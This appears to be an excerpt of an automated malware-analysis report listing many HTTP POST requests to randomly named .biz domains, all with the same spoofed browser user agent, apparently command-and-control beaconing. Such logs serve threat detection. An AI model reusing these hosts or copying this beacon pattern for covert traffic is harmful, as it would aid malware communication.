                Source: global trafficHTTP traffic detected: POST /hdokbthlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xllckl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nfbd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /mr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ldxvcwjydqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qlyttg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rbpibulhoasascdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /aatcckarfifoo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /nempu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /agwyffystye HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /mgvdqejexijygsb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cwhybsvpmfyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wiwimspu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rwiyegsmnxbaierb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /yrhkaiacfhbp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /lvawmhxu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hkamlwlybbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fokcciedcqjopse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yxknqhe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bvfgvukbuqpt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /mtdievukjebc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gpyvldlckbfoes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /buaqnbkgjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ehwru HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lvdayepitqcdyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lvojr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wkwfipyoltumu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fxrfgipsrdogf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jagvrjcebgwmee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xqpxqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /fnppu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /llrqvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /yro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hegy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hwyhtns HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /pjkmdseqxhhvplr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /gjsue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /toabwtjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ojwsrlrloa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /wtojknw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /haroldungxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /wjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bbqlwawxhwkmtrfc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /am HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xahrrvaf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rfuetphopheyd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /bvynwxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xxyycbpqqgrofbr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /gmkfkxvhjjwggemm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /fumyjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /hubil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bulntsganndw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ckivxpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ltyaxjqvibv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /pt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dgltjhlriyylmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /leqoagwnoid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
